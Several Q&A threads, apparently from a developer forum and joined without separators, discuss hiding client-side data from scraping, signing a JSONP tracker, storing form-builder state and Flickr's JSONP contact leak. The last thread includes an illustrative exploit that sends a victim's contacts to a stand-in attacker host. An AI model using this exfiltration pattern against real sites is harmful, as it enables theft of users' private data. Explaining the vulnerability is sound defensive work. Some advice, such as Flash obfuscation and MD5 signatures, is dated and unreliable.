I'm working on a new web app where a large amount of content (text, images, meta-data) is requested via an Ajax request.
No auth or login required for a user to access this.
My concern is that you could easily look up the data source URL and hit it directly outside the app to pull down large amounts of data. Then again, if you can do that, you could probably just scrape the static HTML pages elsewhere that also carry this content.
Are there any suggestions on methods to obfuscate, hide, or otherwise make it very difficult to access the data directly?
Example: the web app's HTML page contains a key that is republished every 30 minutes. On the server side the data is obfuscated based on this key. To get the data outside the app you'd need to figure out the data source URL and also take the extra step of scraping the page for a fresh key every 30 minutes.
I realize there is no 100% way to stop someone, but I'm talking more about deterrence.
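To make that concrete, the sort of thing I have in mind looks roughly like this in Node.js (the endpoint names, the interval, and the simple key check are all just placeholders):

var express = require('express');
var crypto = require('crypto');
var app = express();

// A key that is regenerated every 30 minutes
var currentKey = crypto.randomBytes(16).toString('hex');
setInterval(function () {
  currentKey = crypto.randomBytes(16).toString('hex');
}, 30 * 60 * 1000);

app.get('/app', function (req, res) {
  // The page embeds the current key for the client-side Ajax code to send back
  res.send('<script>var dataKey = "' + currentKey + '";</script> ...rest of the page...');
});

app.get('/data', function (req, res) {
  if (req.query.key !== currentKey) {
    return res.status(403).send('stale or missing key');
  }
  res.json({ content: '...the real content...' });
});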
Use sessions in your web app. Make a note (e.g. a database entry or some other record your server-side code can access) when a valid request for the first page is received, and have the code behind the second page refuse to return the data when a request arrives without a corresponding session entry.
Obviously the specifics on how to do this will vary between languages, but most robust web platforms will support sessions, largely for this type of reason.
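For example, in Node.js with express-session (all of the names here are illustrative):

var express = require('express');
var session = require('express-session');
var app = express();

app.use(session({ secret: 'change-me', resave: false, saveUninitialized: true }));

app.get('/app', function (req, res) {
  req.session.sawFirstPage = true;          // the "note" that a valid page view happened
  res.send('...the first page HTML...');
});

app.get('/data', function (req, res) {
  if (!req.session.sawFirstPage) {
    return res.status(403).send('no valid session');   // exclude the data
  }
  res.json({ content: '...the Ajax payload...' });
});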
If you want to display real-time data and are concerned about scrapers, and if this is a big enough concern, then I suggest doing it with Flash instead of JS (AJAX). Have the data display within a Flash object. Flash can make real-time send/receive requests to the server just like AJAX, but the benefit is that the whole stage, data, code, etc. live inside the Flash object, which is much harder to scrape. The Flash object makes the request, you output the response as an encrypted string, and you decrypt it within Flash and display it from there.
"Are there any suggestions on methods to obfuscate, hide, or otherwise make it very difficult to access the data directly?"
That answers your own question: if the data is worth getting, it will be obtained; obfuscation merely makes it harder to find.
In the server-side script that processes the Ajax call and returns the data, you could check where the request came from.
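For example, in Node/Express (shown only as an illustration; the Referer header is easy to forge or strip, so this is a deterrent at best):

var express = require('express');
var app = express();

app.use('/data', function (req, res, next) {
  var referer = req.get('Referer') || '';
  if (referer.indexOf('https://myapp.example.com/') !== 0) {   // your app's own origin
    return res.status(403).send('forbidden');
  }
  next();
});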
I am making an online book reader, and my problem is that whatever I do to secure the book data, it can be easily extracted through Firebug.
I tried the following to protect my book content:
I sent encrypted data from the server, decrypted it on the client side, and drew the text to an HTML canvas.
But this process didn't work out either; in the end I could still pull the data out with Firebug.
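Roughly what that looked like, simplified (CryptoJS here just stands in for whichever crypto library is used, and the file and element names are made up):

// The key has to reach the browser somehow, so it is never really secret
var key = 'key-embedded-in-or-fetched-by-the-page';

fetch('/book/page1.enc')
  .then(function (res) { return res.text(); })
  .then(function (ciphertext) {
    // At this point the plaintext sits in an ordinary variable that Firebug /
    // the browser's devtools can inspect, breakpoint on, or log.
    var plaintext = CryptoJS.AES.decrypt(ciphertext, key).toString(CryptoJS.enc.Utf8);
    var ctx = document.getElementById('page').getContext('2d');
    ctx.font = '16px serif';
    ctx.fillText(plaintext, 10, 50);
  });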
Is there any way I can protect my content?
The only solution I can see is sending images from the server, but I don't want that either because it would put too much load on my server. Is there a better way to solve this problem?
I have heard about node.js, a JavaScript-based server. Can I render a page from an HTML5 canvas on the server side and send it straight to the browser?
If you deliver content as HTML (no matter how you create it), it will always be visible to the end user via the browser's developer tools. With this approach, all you can do is stop the 'regular Joe' from simply saving the page or copy/pasting it somewhere else. Technically advanced users will be able to 'read' your content however they wish.
So you would need to use an embedded object, like a Flash movie, which loads the encrypted text, decrypts it, and displays it. These are not as easy to copy as HTML, but it is still possible if someone wants it badly enough.
Finally, even if you put all your text into images, there is text-recognition software available, and your text can be extracted within minutes of work. So your only real option is to make it easier to pay you to unlock the text than to hack it out with tools.
I think you just have to accept that any data sent from the server to the client is data you have given up control over; there is no way around that. Even if you create a bitmap image on the server and send it to the client, it will still be possible to OCR-decode the image and get back the text.
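For completeness, if you decided a server-rendered image was still worth it, a minimal node.js sketch with the node-canvas package might look like this (the endpoint and helper names are invented, and the package usage is assumed from its documentation):

var express = require('express');
var createCanvas = require('canvas').createCanvas;
var app = express();

app.get('/book-page.png', function (req, res) {
  var canvas = createCanvas(600, 800);
  var ctx = canvas.getContext('2d');
  ctx.font = '16px serif';
  // loadPageText() stands for however you fetch the requested page's text
  ctx.fillText(loadPageText(req.query.page), 20, 40);
  res.type('png').send(canvas.toBuffer('image/png'));
});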
Instead, perhaps, focus on methods for motivating people to pay or donate for the content. Or seek other revenue streams.
That being said, web workers could perhaps be a way to hide data from the DOM as you ask. But since web workers don't have access to the DOM, and hence the canvas, you will need to proxy your canvas calls, and Firebug or similar tools will still be able to trace those calls. It is left as an exercise to the reader to ensure those calls don't contain data that can be easily understood.
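A bare-bones sketch of what that proxying looks like, and why it doesn't really help: the readable text still crosses postMessage, where any debugger can see it (the file and function names are illustrative).

// main.js -- the worker cannot touch the canvas, so the page proxies draw calls
var ctx = document.getElementById('page').getContext('2d');
var worker = new Worker('reader-worker.js');

worker.onmessage = function (e) {
  // The decrypted text arrives here in the clear; devtools can break on or
  // log this handler just as easily as any other page code.
  ctx.fillText(e.data.text, e.data.x, e.data.y);
};

worker.postMessage({ ciphertext: '...the encrypted page...' });

// reader-worker.js -- decrypt inside the worker, away from the DOM
self.onmessage = function (e) {
  var plaintext = decryptPage(e.data.ciphertext);   // decryptPage() is whatever you use
  self.postMessage({ text: plaintext, x: 10, y: 50 });
};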
Just starting to use Highcharts. If I include data in an array within the JavaScript, the data is available for anyone to download when they view the source. The same would be true when the data is loaded from, say, a CSV file. Is there a way of protecting the data against copying/downloading?
No, since HighCharts is a client-side JavaScript library, data available to it is also potentially available to the end user. There really is no way to "secure" it once the data reaches the user's browser, although you can use HTTPS, server-side authentication, etc. to at least guarantee in principle that only the intended user receives the data.
If you need to visualize your data while keeping the actual raw data secure, the obvious solution is to render the data on the server and just (in the end) serve up an image or other static content to the user. But then you lose the nice, interactive charts.
You might be able to use Flash or Silverlight to retrieve the data, to make part of the process harder to reverse engineer. This is not securing anything, just making it a bit harder for a determined user.
On the other hand, a user can see the data anyway in the final chart. If they really want to download the data they could painstakingly identify each data point and create their own CSV file, right? You need to figure out what is good enough for your particular use case, and strike the appropriate balance.
Being that HighCharts is a client-side JS system, I don't believe there is a way to get data to it securely. If you just attempt an AJAX call to get data at runtime, a user can see that call and the response. As you said you cannot just populate a variable in the source, as it is visible there.
Try the render charts on server feature:
http://www.highcharts.com/docs/export-module/render-charts-serverside
I am working on implementing a JavaScript web bug that will be inserted into our clients' web pages. One of the features our clients would like is a way to pass pieces of the HTML on their web pages to our server through the web bug. We are using JSONP, and the server hosting the JavaScript web bug is different from the server hosting the web page. The basic idea is this:
var element = document.getElementById(id);
var html = element.innerHTML;
// getSrcUrl() URL-encodes the HTML into a GET request, e.g.
// www.example.com/script?html=encodedhtml
var url = getSrcUrl(html);
// Inject a script tag pointing at our server, JSONP-style
document.write(unescape("%3Cscript src='" + url + "' type='text/javascript'%3E%3C/script%3E"));
The security problem is that anyone could make a GET request to our server with arbitrary HTML that isn't from the web page hosting the web bug. Is there any way to make this secure?
I know we could check HTTP headers for the referrer, but this can easily be forged. I saw some ideas where the server passed a unique token that had to be returned in the GET request, but it seems like this could be forged too.
My hunch is that what we're trying to do can't be done securely, but I wanted to throw this out to the community to see if there's something clever that can be done. Otherwise, I'm going to have to build a screen scraper that downloads the pages directly from our clients and extracts the relevant HTML for their page.
Thanks for any and all help!
EDIT
To be clear, our clients' web pages are public-facing with no security. In other words, any Internet user could visit a page and execute the JavaScript bug that submits the HTML fragment.
EDIT 2
An acceptable answer is "this is impossible"! If that is the case, and you give a good explanation of why, I will choose it as the accepted answer.
EDIT 3
What we are building is a kind of Google Analytics system for our clients. We are trying to track visits to unique "items" by each visitor and then automatically collect information about each item via the HTML fragment. We will then insert information about the item on other pages by injecting the HTML fragment that we collected from the original item. We are trying to do all this without requiring our clients to install anything on their servers, just by having them include our JavaScript web bug in their HTML.
If you want to ensure something wasn't tampered with, it cannot go through the client unencrypted.
The only ways to do this securely are to:
As you suggest, retrieve the appropriate page server-side
or
Encrypt/sign the HTML before it goes to the client, using a key unknown to them, so that the client cannot modify it
Assuming you can get your client's web server to MD5 something for you, this seems like a good place to use an MD5-based signature. Essentially, the client's server determines which information it wants to send you, concatenates it all into a string, appends a secret key, MD5s the whole thing, and passes the result along with the rest of its input.
On your server, you take all of the input except that signature, concatenate it together, append the secret key, and MD5 it. If the result matches the signature, you know the input is valid.
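Concretely, the check on your server might look something like this (Node.js used purely for illustration; the field layout is an assumption):

var crypto = require('crypto');

var SECRET = 'key-shared-only-between-the-two-servers';

// 'fields' are the values the client's server sent, in an agreed order,
// and 'signature' is the md5 it computed over those values plus the secret.
function isValidInput(fields, signature) {
  var expected = crypto.createHash('md5')
    .update(fields.join('') + SECRET)
    .digest('hex');
  return expected === signature;
}

// e.g. isValidInput([pageUrl, itemId], requestParams.sig)

(An HMAC, e.g. crypto.createHmac('sha256', SECRET), is the more standard way to build the same kind of signature, but the idea is identical.)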
Unfortunately, it looks like you're determining the HTML to send on the client (browser) side. Due to the fact that JavaScript is plainly visible for all to see, you can't really use a secret string.
So, unless it's possible to move that kind of processing to the server side, I think you're out of luck.
I'm working on a web-based form builder that uses a mix of jQuery and PHP server-side interaction. While the user is building the form, I'm trying to determine the best method to store each of the form items before all the data is sent to the server. I've looked at the following methods:
Javascript arrays
XML document
Send each form item to the server side to be stored in a session
The good, the bad and the ugly
Depends on your application's functionality and requirements, but JavaScript would probably be the best way. You can use arrays, objects, or whatever else JavaScript offers. It's server-independent, and it will preserve the data as long as the client session stays present (i.e. the browser window doesn't close for whatever reason), and even that limitation can be worked around quite easily (see my last paragraph).
Using XML documents would be the worst solution because XML is not as well supported on the client side as you might think.
Server-side sessions are good and bad. They are fine if you store intermediate results from time to time, so that if the client session ends for whatever reason, the user doesn't lose all their data. But the problem is that the session may just as well expire on the server.
If I were you, I'd use JavaScript storage and, if needed, occasionally send JSON-serialized results to the server and persist them there as well (depending on your business process, storing this data somewhere other than the session could be the better solution). I'd only bother with the server-side part if I knew users would most likely build forms in multiple stages, over a longer period of time and across multiple client sessions, though it can serve as failure prevention too. Anyway: JavaScript is your best bet, with possible server-side interaction.
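Something along these lines, for instance (all names are invented):

// Keep the form being built in a plain JavaScript structure on the client...
var formItems = [];

function addItem(type, label) {
  formItems.push({ type: type, label: label });
}

// ...and occasionally push a JSON snapshot to the server so nothing is lost
// if the browser session ends unexpectedly.
function persistDraft() {
  $.ajax({
    url: '/form-builder/save-draft',
    type: 'POST',
    contentType: 'application/json',
    data: JSON.stringify(formItems)
  });
}

setInterval(persistDraft, 60 * 1000);   // e.g. once a minute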
Preserving data between pages on the client
Be aware that it's also possible to preserve data between pages on the client side. Check out the sessvars library for this. Even if the page gets refreshed, or is redirected away and then returned to, the data can be kept on the client side across these events like magic. A marvelous and rather tiny library that has saved me several times, and it considerably lessened application complexity that would otherwise have had to be handled with something heavier.
I used TaffyDB to store data, and it's just wonderfully easy to implement.
Hope this helps you
You may want to check out PersistJS, which exposes a cross-browser persistent storage object. Of course, being persistent, data stored with this library survives sessions, not just page changes.
The latest version (0.2.0) is here – note the version in the above linked post is 0.1.0.
A combination of #1 (although I'd use objects, not arrays necessarily) and #3 would seem like a good approach. Storing the data locally in the browser (#1) makes it immediately accessible. Backing that up with session-based server-side storage defends you from the page being refreshed; you can magically restore the page just as it was.
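For instance, on page load you could ask the server whether it has a saved draft for the current session and rebuild the form from it (endpoint and helper names are illustrative):

// Restore the in-progress form from the server-side session backup, if any
$.getJSON('/form-builder/load-draft', function (items) {
  (items || []).forEach(function (item) {
    renderFormItem(item);   // renderFormItem() would be your own UI code
  });
});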
This flickr blog post discusses the thought behind their latest improvements to the people selector autocomplete.
One problem they had to overcome was how to parse and otherwise handle so much data (i.e., all your contacts) client-side. They tried getting XML and JSON via AJAX, but found it too slow. They then had this to say about loading the data via a dynamically generated script tag (with callback function):
JSON and Dynamic Script Tags: Fast but Insecure
Working with the theory that large string manipulation was the problem with the last approach, we switched from using Ajax to instead fetching the data using a dynamically generated script tag. This means that the contact data was never treated as a string, and was instead executed as soon as it was downloaded, just like any other JavaScript file. The difference in performance was shocking: 89ms to parse 10,000 contacts (a reduction of 3 orders of magnitude), while the smallest case of 172 contacts only took 6ms. The parse time per contact actually decreased the larger the list became. This approach looked perfect, except for one thing: in order for this JSON to be executed, we had to wrap it in a callback method. Since it's executable code, any website in the world could use the same approach to download a Flickr member's contact list. This was a deal breaker. (emphasis mine)
Could someone please go into the exact security risk here (perhaps with a sample exploit)? How is loading a given file via the "src" attribute in a script tag different from loading that file via an AJAX call?
This is a good question, and this exact sort of exploit was once used to steal contact lists from Gmail.
Whenever a browser fetches data from a domain, it sends across any cookie data that the site has set. This cookie data can then be used to authenticate the user and fetch user-specific data.
For example, when you load a new stackoverflow.com page, your browser sends your cookie data to stackoverflow.com. Stack Overflow uses that data to determine who you are and shows the appropriate data for you.
The same is true for anything else that you load from a domain, including CSS and Javascript files.
The security vulnerability that Flickr faced was that any website could embed this javascript file hosted on Flickr's servers. Your Flickr cookie data would then be sent over as part of the request (since the javascript was hosted on flickr.com), and Flickr would generate a javascript document containing the sensitive data. The malicious site would then be able to get access to the data that was loaded.
Here is the exploit that was used to steal google contacts, which may make it more clear than my explanation above:
http://blogs.zdnet.com/Google/?p=434
If I were to put an HTML page on my website like this:
<script src="http://www.flickr.com/contacts.js"></script>
<script> // send the contact data to my server with AJAX </script>
Assuming contacts.js uses the session to know which contacts to send, I would now have a copy of your contacts.
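For that to work, my page would also have to define, above that script tag, whatever callback function contacts.js wraps its data in; the name showContacts below is purely a guess for illustration:

// Hypothetical callback name - it would be whatever Flickr's contacts.js invokes
function showContacts(contacts) {
  // The victim's contact list is now just a JavaScript value on my page,
  // so I can ship it off to my own server however I like.
  new Image().src = 'http://my-evil-site.example/collect?c=' +
    encodeURIComponent(JSON.stringify(contacts));
}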
However if the contacts are sent via JSON, I can't request them from my HTML page, because it would be a cross-domain AJAX request, which isn't allowed. I can't request the page from my server either, because I wouldn't have your session ID.
In plain english:
Unauthorised computer code (Javascript) running on people's computers is not allowed to get data from anywhere but the site on which it runs - browsers are obliged to enforce this rule.
There is no corresponding restriction on where code can be sourced from, so if you embed data in code any website the user visits can employ the user's credentials to obtain the user's data.